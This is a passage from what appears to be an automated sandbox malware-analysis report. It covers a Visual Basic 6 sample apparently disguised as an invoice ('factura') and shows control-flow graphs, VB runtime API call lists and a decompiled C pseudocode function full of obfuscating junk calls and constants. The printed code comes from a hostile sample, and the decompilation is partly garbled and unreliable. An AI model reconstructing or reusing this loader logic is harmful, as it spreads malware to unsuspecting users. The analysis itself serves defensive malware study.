40a9c4 __vbaChkstk 1595->1621 1596 4088a3 1597 4088b2 __vbaHresultCheckObj 1596->1597 1598 4088d9 __vbaFreeStr 1596->1598 1597->1598 1599 408935 __vbaVarTstLt 1598->1599 1599->1593 1600 408962 __vbaFreeVar __vbaAryDestruct 1599->1600 1605 409091 6 API calls 1604->1605 1606 4090f9 1605->1606 1607 4090e9 __vbaHresultCheck 1605->1607 1608 409100 __vbaVarTstNe __vbaFreeVarList 1606->1608 1607->1608 1609 409218 __vbaFreeStr 1608->1609 1611 40913d 1608->1611 1609->1563 1612 409177 1611->1612 1613 40915a __vbaHresultCheckObj 1611->1613 1614 4091a2 1612->1614 1615 409187 __vbaNew2 1612->1615 1613->1612 1616 4091ac __vbaObjSet 1614->1616 1615->1616 1617 4091e4 1616->1617 1618 409209 1617->1618 1619 4091ef __vbaHresultCheckObj 1617->1619 1620 409210 __vbaFreeObj 1618->1620 1619->1620 1620->1609 1622 40aa04 6 API calls 1621->1622 1623 40aa80 __vbaFreeStr 1622->1623 1624 40aa56 __vbaVarDup #529 __vbaFreeVar 1622->1624 1623->1596 1624->1623 1752 40acba #617 __vbaStrVarMove __vbaStrMove __vbaFreeVar 1753 40ad39 __vbaFreeStr 1752->1753 1832 40a7fa __vbaChkstk 1833 40a83a 1832->1833 1834 40a843 __vbaNew2 1833->1834 1835 40a85b 1833->1835 1834->1835 1836 40a884 __vbaHresultCheckObj 1835->1836 1837 40a89b 1835->1837 1836->1837 1838 40a8c2 __vbaHresultCheckObj 1837->1838 1839 40a8dc 1837->1839 1840 40a8e0 __vbaFreeObj 1838->1840 1839->1840 1841 40a902 1840->1841 1842 40a927 1841->1842 1843 40a90d __vbaHresultCheckObj 1841->1843 1844 40a92b __vbaStrCmp __vbaFreeStr 1842->1844 1843->1844 1845 40a950 1844->1845 1846 40a988 1844->1846 1845->1846 1847 40a96e __vbaHresultCheckObj 1845->1847 1847->1846 1755 4098bb __vbaChkstk 1756 4098fb 6 API calls 1755->1756 1757 40995a 6 API calls 1756->1757 1758 40994e #580 1756->1758 1759 4099b5 1757->1759 1760 409a9a __vbaFreeObj __vbaFreeStr __vbaFreeStr 1757->1760 1758->1757 1762 4099d6 1759->1762 1763 4099be __vbaNew2 1759->1763 1764 409a16 1762->1764 1765 4099ff __vbaHresultCheckObj 1762->1765 1763->1762 1766 409a1a __vbaChkstk __vbaCastObj __vbaObjSet 1764->1766 1765->1766 1767 409a62 1766->1767 1768 409a84 1767->1768 1769 409a6d __vbaHresultCheckObj 1767->1769 1770 409a88 __vbaFreeObjList 1768->1770 1769->1770 1770->1760 1869 40a7bb __vbaFreeObj __vbaFreeVar 1680 409afc __vbaChkstk 1681 409b3e 6 API calls 1680->1681 1682 409c50 #664 __vbaStrVarVal #581 __vbaFpR8 1681->1682 1683 409b94 1681->1683 1684 409cc1 __vbaFreeStr __vbaFreeVarList 1682->1684 1685 409bb8 1683->1685 1686 409b9d __vbaNew2 1683->1686 1689 409d18 1684->1689 1690 409de2 __vbaFreeStr __vbaFreeObj 1684->1690 1688 409bc2 __vbaLateMemCallLd __vbaObjVar __vbaObjSetAddref 1685->1688 1686->1688 1694 409c08 1688->1694 1692 409d37 1689->1692 1693 409d3f _adj_fdiv_m64 1689->1693 1698 409e50 1692->1698 1699 409d5a __vbaFpI4 1692->1699 1693->1692 1695 409c39 1694->1695 1696 409c19 __vbaHresultCheckObj 1694->1696 1697 409c40 __vbaFreeObj __vbaFreeVar 1695->1697 1696->1697 1697->1682 1698->1698 1700 409db1 1699->1700 1700->1690 1701 409dc2 __vbaHresultCheckObj 1700->1701 1701->1690 1780 40897f __vbaFreeStrList __vbaFreeVar __vbaAryDestruct

        Executed Functions

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 110 40169c-4016c1 #100 111 4016c3-4016c5 110->111 112 401659-40165b 110->112 113 4016c6-40170f 111->113 112->110 115 401711-4017b0 113->115 118 4017b2-4017b4 115->118 119 40181b-401823 115->119 120 401825-40182d 118->120 121 4017b7 118->121 119->120 122 401833-401834 120->122 123 4017f1-4017ff 121->123 124 4017ba-4017dd 121->124 132 401835-401847 122->132 133 401867-401881 122->133 123->122 127 401801-401816 123->127 125 401848-40184a 124->125 126 4017df-4017e2 124->126 134 40184b-40184c 125->134 129 4017e4 126->129 130 40184d-401866 126->130 137 401818 127->137 138 40188b-401964 127->138 129->134 136 4017e6-4017ec 129->136 130->133 132->125 135 401883-401887 133->135 134->130 135->138 136->123 137->135 139 40181a 137->139 139->119
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: #100
        • String ID: VB5!6&*
        • API String ID: 1341478452-3593831657
        • Opcode ID: 9814345e06fa9b9c5461a8003243bef284d040dba379b1faf58db90840576db5
        • Instruction ID: 5487e01e75c205a120487ae8b0414bebd790cc329bbddb10ac4434718c237bc6
        • Opcode Fuzzy Hash: 9814345e06fa9b9c5461a8003243bef284d040dba379b1faf58db90840576db5
        • Instruction Fuzzy Hash: 15A1556244E3C19FD3078BB48D656A17FB4AE1321470E45EBC8C1DF0B3D22D995AC766
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 0 407e34-407ec0 __vbaChkstk #519 __vbaStrMove __vbaStrCmp __vbaFreeStr 2 407ec6-407ecd 0->2 3 407fbe-408012 #591 __vbaStrMove __vbaStrCmp __vbaFreeStr __vbaFreeVar 0->3 6 407eea 2->6 7 407ecf-407ee8 __vbaNew2 2->7 4 408021-4080d9 __vbaStrCopy __vbaFreeStr __vbaStrCopy 3->4 5 408014-40801e #569 3->5 15 4080fb 4->15 16 4080db-4080f9 __vbaHresultCheckObj 4->16 5->4 8 407ef4-407f73 __vbaChkstk * 2 6->8 7->8 12 407f95 8->12 13 407f75-407f93 __vbaHresultCheckObj 8->13 14 407f9c-407fb9 __vbaVar2Vec __vbaAryMove __vbaFreeVar 12->14 13->14 14->3 17 408102-408169 __vbaFreeStr __vbaStrCopy 15->17 16->17 19 40818b 17->19 20 40816b-408189 __vbaHresultCheckObj 17->20 21 408192-408250 __vbaFreeStr __vbaStrCopy __vbaFreeStr __vbaStrCopy * 2 call 40904f 19->21 20->21 24 408272 21->24 25 408252-408270 __vbaHresultCheckObj 21->25 26 408279-4082b7 __vbaFreeStrList 24->26 25->26 28 4082d9 26->28 29 4082b9-4082d7 __vbaHresultCheckObj 26->29 30 4082e0-4083ed __vbaStrCopy __vbaFreeStr __vbaStrCopy 28->30 29->30 35 40840f 30->35 36 4083ef-40840d __vbaHresultCheckObj 30->36 37 408416-408479 __vbaFreeStr 35->37 36->37 39 40849b 37->39 40 40847b-408499 __vbaHresultCheckObj 37->40 41 4084a2-4084da __vbaStrCopy 39->41 40->41 43 4084fc 41->43 44 4084dc-4084fa __vbaHresultCheckObj 41->44 45 408503-408538 __vbaFreeStr 43->45 44->45 47 40855a 45->47 48 40853a-408558 __vbaHresultCheckObj 45->48 49 408561-408587 47->49 48->49 51 4085a9 49->51 52 408589-4085a7 __vbaHresultCheckObj 49->52 53 4085b0-40866a __vbaVarAdd __vbaVarMove 51->53 52->53 55 40868c 53->55 56 40866c-40868a __vbaHresultCheckObj 53->56 57 408693-4086c0 55->57 56->57 59 4086e2 57->59 60 4086c2-4086e0 __vbaHresultCheckObj 57->60 61 4086e9-408759 59->61 60->61 63 40877b 61->63 64 40875b-408779 __vbaHresultCheckObj 61->64 65 408782-4087af 63->65 64->65 67 4087d1 65->67 68 4087b1-4087cf __vbaHresultCheckObj 65->68 69 4087d8-408843 67->69 68->69 72 408865 69->72 73 408845-408863 __vbaHresultCheckObj 69->73 74 40886c-40889d __vbaStrCopy call 40a9c4 72->74 73->74 75 4088a3-4088b0 74->75 76 4088d2 75->76 77 4088b2-4088d0 __vbaHresultCheckObj 75->77 78 4088d9-40895b __vbaFreeStr __vbaVarTstLt 76->78 77->78 80 408962-4089b8 __vbaFreeVar __vbaAryDestruct 78->80 81 40895d 78->81 81->53
        C-Code - Quality: 62%
        			E00407E34(void* __ebx, void* __edi, void* __esi, signed int _a4) {
        				void* _v3;
        				signed int _v8;
        				intOrPtr _v12;
        				intOrPtr* _v16;
        				intOrPtr _v20;
        				short _v28;
        				short _v32;
        				char _v40;
        				intOrPtr _v44;
        				char _v48;
        				char _v64;
        				char _v68;
        				short _v72;
        				short _v76;
        				intOrPtr _v80;
        				intOrPtr _v84;
        				char _v88;
        				short _v92;
        				char _v96;
        				char _v100;
        				char _v104;
        				intOrPtr _v112;
        				char _v120;
        				char _v124;
        				intOrPtr _v132;
        				char _v140;
        				char* _v148;
        				intOrPtr _v156;
        				char _v160;
        				char _v164;
        				void* _v168;
        				char _v172;
        				char _v176;
        				char _v180;
        				intOrPtr _v184;
        				char _v188;
        				char _v196;
        				intOrPtr _v200;
        				char _v204;
        				intOrPtr _v208;
        				char _v212;
        				signed int _v216;
        				signed int _v220;
        				intOrPtr* _v232;
        				signed int _v236;
        				signed int _v240;
        				signed int _v244;
        				signed int _v248;
        				signed int _v252;
        				signed int _v256;
        				signed int _v260;
        				signed int _v264;
        				signed int _v268;
        				signed int _v272;
        				signed int _v276;
        				signed int _v280;
        				signed int _v284;
        				signed int _v288;
        				signed int _v292;
        				signed int _v296;
        				signed int _t368;
        				signed int _t373;
        				signed int _t377;
        				signed int _t389;
        				signed int _t396;
        				signed int _t408;
        				signed int _t414;
        				signed int _t434;
        				signed int _t440;
        				signed int _t445;
        				signed int _t450;
        				signed int _t453;
        				signed int _t464;
        				signed int _t469;
        				signed int _t477;
        				signed int _t482;
        				signed int _t492;
        				signed int _t498;
        				char* _t508;
        				intOrPtr* _t510;
        				char* _t511;
        				signed int _t519;
        				char* _t539;
        				char* _t542;
        				char* _t546;
        				void* _t571;
        				void* _t574;
        				intOrPtr* _t575;
        				intOrPtr* _t576;
        
        				_t575 = _t574 - 0xc;
        				 *[fs:0x0] = _t575;
        				L00401420();
        				_v16 = _t575;
        				_v12 = 0x401218;
        				_v8 = _a4 & 0x00000001;
        				_a4 = _a4 & 0xfffffffe;
        				_t368 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t571);
        				_push(" tt");
        				L00401672();
        				L00401678();
        				_push(_t368);
        				_push(0x4026a0);
        				L0040167E();
        				asm("sbb eax, eax");
        				_v216 =  ~( ~( ~_t368));
        				L0040166C();
        				if(_v216 != 0) {
        					if( *0x40c33c != 0) {
        						_v232 = 0x40c33c;
        					} else {
        						_push(0x40c33c);
        						_push(0x4026e4);
        						L0040165A();
        						_v232 = 0x40c33c;
        					}
        					_v216 =  *_v232;
        					_v148 = L"Reklappers";
        					_v156 = 8;
        					_v132 = 0xbc;
        					_v140 = 2;
        					L00401420();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					L00401420();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_t519 =  *((intOrPtr*)( *_v216 + 0x38))(_v216, 0x10, 0x10,  &_v120);
        					asm("fclex");
        					_v220 = _t519;
        					if(_v220 >= 0) {
        						_v236 = _v236 & 0x00000000;
        					} else {
        						_push(0x38);
        						_push(0x4026d4);
        						_push(_v216);
        						_push(_v220);
        						L00401654();
        						_v236 = _t519;
        					}
        					_push( &_v120);
        					_push( &_v124);
        					L00401660();
        					_push( &_v124);
        					_push( &_v96);
        					L00401666();
        					L0040164E();
        				}
        				_v112 = 0x5518;
        				_v120 = 2;
        				_t373 =  &_v120;
        				_push(_t373);
        				L00401648();
        				L00401678();
        				_push(_t373);
        				_push(L"Integer");
        				L0040167E();
        				asm("sbb eax, eax");
        				_v216 =  ~( ~( ~_t373));
        				L0040166C();
        				L0040164E();
        				_t377 = _v216;
        				if(_t377 != 0) {
        					_push(0x8a);
        					L00401642();
        					_v80 = _t377;
        				}
        				L0040163C();
        				_v160 = 0x3b49;
        				_v172 = 0x741641;
        				_v88 =  *0x401210;
        				 *((intOrPtr*)( *_a4 + 0x738))(_a4,  &_v100,  &_v172, 0xc9bfd870, 0x5b04,  &_v160,  &_v100);
        				L0040166C();
        				_v172 = 0x13a44f;
        				_v160 = 0x3145;
        				L0040163C();
        				 *_t575 =  *0x40120c;
        				_t389 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v100,  &_v100,  &_v160, 0xdf661,  &_v172);
        				_v216 = _t389;
        				if(_v216 >= 0) {
        					_v240 = _v240 & 0x00000000;
        				} else {
        					_push(0x6f8);
        					_push(0x4024b4);
        					_push(_a4);
        					_push(_v216);
        					L00401654();
        					_v240 = _t389;
        				}
        				L0040166C();
        				_v188 = 0x1d6641b0;
        				_v184 = 0x5af8;
        				L0040163C();
        				_v172 = 0x10e569;
        				_t396 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v172,  &_v100,  &_v188,  &_v176);
        				_v216 = _t396;
        				if(_v216 >= 0) {
        					_v244 = _v244 & 0x00000000;
        				} else {
        					_push(0x6fc);
        					_push(0x4024b4);
        					_push(_a4);
        					_push(_v216);
        					L00401654();
        					_v244 = _t396;
        				}
        				_v68 = _v176;
        				L0040166C();
        				_v180 =  *0x401208;
        				_v176 =  *0x401204;
        				L0040163C();
        				_v172 =  *0x401200;
        				 *((intOrPtr*)( *_a4 + 0x73c))(_a4,  &_v172,  &_v100,  &_v176,  &_v180);
        				L0040166C();
        				L0040163C();
        				_t539 =  &_v100;
        				L0040163C();
        				_v172 =  *0x4011f8;
        				_t408 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v100, _t539, _t539,  &_v104, 0x1107);
        				_v216 = _t408;
        				if(_v216 >= 0) {
        					_v248 = _v248 & 0x00000000;
        				} else {
        					_push(0x700);
        					_push(0x4024b4);
        					_push(_a4);
        					_push(_v216);
        					L00401654();
        					_v248 = _t408;
        				}
        				L00401636();
        				_t576 = _t575 + 0xc;
        				_t414 =  *((intOrPtr*)( *_a4 + 0x704))(_a4, 0x75a4, 0x3c4f,  &_v160, 2,  &_v100,  &_v104);
        				_v216 = _t414;
        				if(_v216 >= 0) {
        					_v252 = _v252 & 0x00000000;
        				} else {
        					_push(0x704);
        					_push(0x4024b4);
        					_push(_a4);
        					_push(_v216);
        					L00401654();
        					_v252 = _t414;
        				}
        				_v32 = _v160;
        				_v188 =  *0x4011f0;
        				 *((intOrPtr*)( *_a4 + 0x740))(_a4,  &_v188, L"keelboatman", 0x2307, 0x6481cb);
        				_v160 = 0x68a6;
        				 *((intOrPtr*)( *_a4 + 0x744))(_a4,  &_v160, L"kartoffelkurens");
        				_v172 = 0x2abe7a;
        				L0040163C();
        				 *((intOrPtr*)( *_a4 + 0x748))(_a4,  &_v100, 0x4f9d,  &_v172, 0x18c9);
        				L0040166C();
        				_t542 =  &_v100;
        				L0040163C();
        				_v172 = 0x4d098c;
        				_v188 = 0xcfcfeb70;
        				_v184 = 0x5af4;
        				_v268 =  *0x4011e8;
        				_t434 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 0x3414,  &_v188, _t542, _t542,  &_v172, L"Udsendes4",  &_v100);
        				_v216 = _t434;
        				if(_v216 >= 0) {
        					_v256 = _v256 & 0x00000000;
        				} else {
        					_push(0x708);
        					_push(0x4024b4);
        					_push(_a4);
        					_push(_v216);
        					L00401654();
        					_v256 = _t434;
        				}
        				L0040166C();
        				_v188 =  *0x4011e0;
        				_v160 = 0x6b6;
        				_v172 =  *0x4011d8;
        				_t440 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, 0x1a40b7,  &_v172, L"Skibakker3",  &_v160,  &_v188);
        				_v216 = _t440;
        				if(_v216 >= 0) {
        					_v260 = _v260 & 0x00000000;
        				} else {
        					_push(0x70c);
        					_push(0x4024b4);
        					_push(_a4);
        					_push(_v216);
        					L00401654();
        					_v260 = _t440;
        				}
        				L0040163C();
        				_t445 =  *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v100, "lon",  &_v160);
        				_v216 = _t445;
        				if(_v216 >= 0) {
        					_v264 = _v264 & 0x00000000;
        				} else {
        					_push(0x710);
        					_push(0x4024b4);
        					_push(_a4);
        					_push(_v216);
        					L00401654();
        					_v264 = _t445;
        				}
        				_v72 = _v160;
        				L0040166C();
        				_t450 =  *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v172);
        				_v216 = _t450;
        				if(_v216 >= 0) {
        					_v268 = _v268 & 0x00000000;
        				} else {
        					_push(0x714);
        					_push(0x4024b4);
        					_push(_a4);
        					_push(_v216);
        					L00401654();
        					_v268 = _t450;
        				}
        				_v40 = _v172;
        				_t453 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4);
        				asm("fclex");
        				_v216 = _t453;
        				if(_v216 >= 0) {
        					_v272 = _v272 & 0x00000000;
        				} else {
        					_push(0x2b4);
        					_push(0x402484);
        					_push(_a4);
        					_push(_v216);
        					L00401654();
        					_v272 = _t453;
        				}
        				while(1) {
        					_v132 = 1;
        					_v140 = 2;
        					L0040162A();
        					_t546 =  &_v64;
        					L00401630();
        					_v204 = 0x4f19e8c0;
        					_v200 = 0x5af7;
        					_v196 =  *0x4011d0;
        					_v160 = 0x454c;
        					_v188 = 0xd97a0bc0;
        					_v184 = 0x5afd;
        					 *_t576 =  *0x4011c8;
        					_t464 =  *((intOrPtr*)( *_a4 + 0x718))(_a4, _t546, _t546, 0x50e1e2,  &_v188,  &_v160,  &_v196,  &_v204,  &_v212,  &_v120,  &_v140,  &_v64);
        					_v216 = _t464;
        					if(_v216 >= 0) {
        						_v276 = _v276 & 0x00000000;
        					} else {
        						_push(0x718);
        						_push(0x4024b4);
        						_push(_a4);
        						_push(_v216);
        						L00401654();
        						_v276 = _t464;
        					}
        					_v88 = _v212;
        					_v84 = _v208;
        					_t469 =  *((intOrPtr*)( *_a4 + 0x71c))(_a4);
        					_v216 = _t469;
        					if(_v216 >= 0) {
        						_v280 = _v280 & 0x00000000;
        					} else {
        						_push(0x71c);
        						_push(0x4024b4);
        						_push(_a4);
        						_push(_v216);
        						L00401654();
        						_v280 = _t469;
        					}
        					_v164 = 0x16b;
        					_v160 = 0x61b6;
        					_v188 =  *0x4011c0;
        					_v172 = 0x7add9f;
        					_t477 =  *((intOrPtr*)( *_a4 + 0x720))(_a4, 0x2742,  &_v172, 0x4531,  &_v188,  &_v160,  &_v164,  &_v168);
        					_v216 = _t477;
        					if(_v216 >= 0) {
        						_v284 = _v284 & 0x00000000;
        					} else {
        						_push(0x720);
        						_push(0x4024b4);
        						_push(_a4);
        						_push(_v216);
        						L00401654();
        						_v284 = _t477;
        					}
        					_v76 = _v168;
        					_t482 =  *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v160);
        					_v216 = _t482;
        					if(_v216 >= 0) {
        						_v288 = _v288 & 0x00000000;
        					} else {
        						_push(0x724);
        						_push(0x4024b4);
        						_push(_a4);
        						_push(_v216);
        						L00401654();
        						_v288 = _t482;
        					}
        					_v92 = _v160;
        					_v188 = 0x218b51f0;
        					_v184 = 0x5b06;
        					 *_t576 =  *0x4011b8;
        					 *((intOrPtr*)( *_a4 + 0x74c))(_a4,  &_v188, _t546,  &_v160);
        					_v28 = _v160;
        					_t492 =  *((intOrPtr*)( *_a4 + 0x728))(_a4);
        					_v216 = _t492;
        					if(_v216 >= 0) {
        						_v292 = _v292 & 0x00000000;
        					} else {
        						_push(0x728);
        						_push(0x4024b4);
        						_push(_a4);
        						_push(_v216);
        						L00401654();
        						_v292 = _t492;
        					}
        					L0040163C();
        					_v172 = 0x53d0ea;
        					_t498 =  *((intOrPtr*)( *_a4 + 0x72c))(_a4,  &_v172,  &_v100,  &_v188);
        					_v216 = _t498;
        					if(_v216 >= 0) {
        						_v296 = _v296 & 0x00000000;
        					} else {
        						_push(0x72c);
        						_push(0x4024b4);
        						_push(_a4);
        						_push(_v216);
        						L00401654();
        						_v296 = _t498;
        					}
        					_v48 = _v188;
        					_v44 = _v184;
        					L0040166C();
        					_v160 = 0x704;
        					_v172 = 0x8699bf;
        					_v188 =  *0x4011b0;
        					 *((intOrPtr*)( *_a4 + 0x750))(_a4,  &_v188,  &_v172,  &_v160);
        					_v132 = 0x2ffff;
        					_v140 = 0x8003;
        					_push( &_v64);
        					_t508 =  &_v140;
        					_push(_t508);
        					L00401624();
        					if(_t508 == 0) {
        						break;
        					}
        				}
        				_v20 = E0040694E;
        				_t510 = _v20();
        				asm("invalid");
        				asm("cld");
        				 *_t510 =  *_t510 + _t510;
        				 *_t510 =  *_t510 + _t510;
        				asm("wait");
        				_push(E004089B9);
        				L0040164E();
        				_t511 =  &_v96;
        				_push(_t511);
        				_push(0);
        				L00401618();
        				return _t511;
        			}




























































































        0x00407e37
        0x00407e46
        0x00407e52
        0x00407e5a
        0x00407e5d
        0x00407e6a
        0x00407e73
        0x00407e7e
        0x00407e81
        0x00407e86
        0x00407e90
        0x00407e95
        0x00407e96
        0x00407e9b
        0x00407ea2
        0x00407ea8
        0x00407eb2
        0x00407ec0
        0x00407ecd
        0x00407eea
        0x00407ecf
        0x00407ecf
        0x00407ed4
        0x00407ed9
        0x00407ede
        0x00407ede
        0x00407efc
        0x00407f02
        0x00407f0c
        0x00407f16
        0x00407f1d
        0x00407f2e
        0x00407f3b
        0x00407f3c
        0x00407f3d
        0x00407f3e
        0x00407f42
        0x00407f4f
        0x00407f50
        0x00407f51
        0x00407f52
        0x00407f61
        0x00407f64
        0x00407f66
        0x00407f73
        0x00407f95
        0x00407f75
        0x00407f75
        0x00407f77
        0x00407f7c
        0x00407f82
        0x00407f88
        0x00407f8d
        0x00407f8d
        0x00407f9f
        0x00407fa3
        0x00407fa4
        0x00407fac
        0x00407fb0
        0x00407fb1
        0x00407fb9
        0x00407fb9
        0x00407fbe
        0x00407fc5
        0x00407fcc
        0x00407fcf
        0x00407fd0
        0x00407fda
        0x00407fdf
        0x00407fe0
        0x00407fe5
        0x00407fec
        0x00407ff2
        0x00407ffc
        0x00408004
        0x00408009
        0x00408012
        0x00408014
        0x00408019
        0x0040801e
        0x0040801e
        0x00408029
        0x0040802e
        0x00408037
        0x00408064
        0x0040806f
        0x00408078
        0x0040807d
        0x00408087
        0x00408098
        0x004080b7
        0x004080c6
        0x004080cc
        0x004080d9
        0x004080fb
        0x004080db
        0x004080db
        0x004080e0
        0x004080e5
        0x004080e8
        0x004080ee
        0x004080f3
        0x004080f3
        0x00408105
        0x0040810a
        0x00408114
        0x00408126
        0x0040812b
        0x00408156
        0x0040815c
        0x00408169
        0x0040818b
        0x0040816b
        0x0040816b
        0x00408170
        0x00408175
        0x00408178
        0x0040817e
        0x00408183
        0x00408183
        0x00408198
        0x0040819e
        0x004081a9
        0x004081b5
        0x004081c3
        0x004081ce
        0x004081f5
        0x004081fe
        0x0040820b
        0x00408215
        0x00408218
        0x0040822e
        0x0040823d
        0x00408243
        0x00408250
        0x00408272
        0x00408252
        0x00408252
        0x00408257
        0x0040825c
        0x0040825f
        0x00408265
        0x0040826a
        0x0040826a
        0x00408283
        0x00408288
        0x004082a4
        0x004082aa
        0x004082b7
        0x004082d9
        0x004082b9
        0x004082b9
        0x004082be
        0x004082c3
        0x004082c6
        0x004082cc
        0x004082d1
        0x004082d1
        0x004082e7
        0x004082f1
        0x00408315
        0x0040831b
        0x00408338
        0x0040833e
        0x00408350
        0x00408372
        0x0040837b
        0x00408385
        0x00408388
        0x0040838d
        0x00408397
        0x004083a1
        0x004083c3
        0x004083da
        0x004083e0
        0x004083ed
        0x0040840f
        0x004083ef
        0x004083ef
        0x004083f4
        0x004083f9
        0x004083fc
        0x00408402
        0x00408407
        0x00408407
        0x00408419
        0x00408424
        0x0040842a
        0x00408439
        0x00408466
        0x0040846c
        0x00408479
        0x0040849b
        0x0040847b
        0x0040847b
        0x00408480
        0x00408485
        0x00408488
        0x0040848e
        0x00408493
        0x00408493
        0x004084aa
        0x004084c7
        0x004084cd
        0x004084da
        0x004084fc
        0x004084dc
        0x004084dc
        0x004084e1
        0x004084e6
        0x004084e9
        0x004084ef
        0x004084f4
        0x004084f4
        0x0040850a
        0x00408511
        0x00408525
        0x0040852b
        0x00408538
        0x0040855a
        0x0040853a
        0x0040853a
        0x0040853f
        0x00408544
        0x00408547
        0x0040854d
        0x00408552
        0x00408552
        0x00408567
        0x00408572
        0x00408578
        0x0040857a
        0x00408587
        0x004085a9
        0x00408589
        0x00408589
        0x0040858e
        0x00408593
        0x00408596
        0x0040859c
        0x004085a1
        0x004085a1
        0x004085b0
        0x004085b0
        0x004085b7
        0x004085d0
        0x004085d7
        0x004085da
        0x004085df
        0x004085e9
        0x004085f9
        0x004085ff
        0x00408608
        0x00408612
        0x0040864c
        0x00408657
        0x0040865d
        0x0040866a
        0x0040868c
        0x0040866c
        0x0040866c
        0x00408671
        0x00408676
        0x00408679
        0x0040867f
        0x00408684
        0x00408684
        0x00408699
        0x004086a2
        0x004086ad
        0x004086b3
        0x004086c0
        0x004086e2
        0x004086c2
        0x004086c2
        0x004086c7
        0x004086cc
        0x004086cf
        0x004086d5
        0x004086da
        0x004086da
        0x004086e9
        0x004086f2
        0x00408701
        0x00408707
        0x00408746
        0x0040874c
        0x00408759
        0x0040877b
        0x0040875b
        0x0040875b
        0x00408760
        0x00408765
        0x00408768
        0x0040876e
        0x00408773
        0x00408773
        0x00408789
        0x0040879c
        0x004087a2
        0x004087af
        0x004087d1
        0x004087b1
        0x004087b1
        0x004087b6
        0x004087bb
        0x004087be
        0x004087c4
        0x004087c9
        0x004087c9
        0x004087df
        0x004087e3
        0x004087ed
        0x00408805
        0x00408817
        0x00408824
        0x00408830
        0x00408836
        0x00408843
        0x00408865
        0x00408845
        0x00408845
        0x0040884a
        0x0040884f
        0x00408852
        0x00408858
        0x0040885d
        0x0040885d
        0x00408874
        0x00408879
        0x0040889d
        0x004088a3
        0x004088b0
        0x004088d2
        0x004088b2
        0x004088b2
        0x004088b7
        0x004088bc
        0x004088bf
        0x004088c5
        0x004088ca
        0x004088ca
        0x004088df
        0x004088e8
        0x004088ee
        0x004088f3
        0x004088fc
        0x0040890c
        0x0040892f
        0x00408935
        0x0040893c
        0x00408949
        0x0040894a
        0x00408950
        0x00408951
        0x0040895b
        0x00000000
        0x00000000
        0x0040895d
        0x00408967
        0x0040896a
        0x0040896d
        0x00408972
        0x00408973
        0x00408975
        0x00408977
        0x00408978
        0x004089a8
        0x004089ad
        0x004089b0
        0x004089b1
        0x004089b3
        0x004089b8

        APIs
        • __vbaChkstk.MSVBVM60(?,00401426), ref: 00407E52
        • #519.MSVBVM60( tt,?,?,?,?,00401426), ref: 00407E86
        • __vbaStrMove.MSVBVM60( tt,?,?,?,?,00401426), ref: 00407E90
        • __vbaStrCmp.MSVBVM60(004026A0,00000000, tt,?,?,?,?,00401426), ref: 00407E9B
        • __vbaFreeStr.MSVBVM60(004026A0,00000000, tt,?,?,?,?,00401426), ref: 00407EB2
        • __vbaNew2.MSVBVM60(004026E4,0040C33C,004026A0,00000000, tt,?,?,?,?,00401426), ref: 00407ED9
        • __vbaChkstk.MSVBVM60(?), ref: 00407F2E
        • __vbaChkstk.MSVBVM60(?), ref: 00407F42
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,00000038), ref: 00407F88
        • __vbaVar2Vec.MSVBVM60(?,?), ref: 00407FA4
        • __vbaAryMove.MSVBVM60(?,?,?,?), ref: 00407FB1
        • __vbaFreeVar.MSVBVM60(?,?,?,?), ref: 00407FB9
        • #591.MSVBVM60(00000002), ref: 00407FD0
        • __vbaStrMove.MSVBVM60(00000002), ref: 00407FDA
        • __vbaStrCmp.MSVBVM60(Integer,00000000,00000002), ref: 00407FE5
        • __vbaFreeStr.MSVBVM60(Integer,00000000,00000002), ref: 00407FFC
        • __vbaFreeVar.MSVBVM60(Integer,00000000,00000002), ref: 00408004
        • #569.MSVBVM60(0000008A,Integer,00000000,00000002), ref: 00408019
        • __vbaStrCopy.MSVBVM60(Integer,00000000,00000002), ref: 00408029
        • __vbaFreeStr.MSVBVM60(?,00741641,C9BFD870,00005B04,00003B49,?), ref: 00408078
        • __vbaStrCopy.MSVBVM60(?,00741641,C9BFD870,00005B04,00003B49,?), ref: 00408098
        • __vbaHresultCheckObj.MSVBVM60(?,00401218,004024B4,000006F8,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49,?), ref: 004080EE
        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49), ref: 00408105
        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49), ref: 00408126
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,000006FC,?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F), ref: 0040817E
        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49), ref: 0040819E
        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49), ref: 004081C3
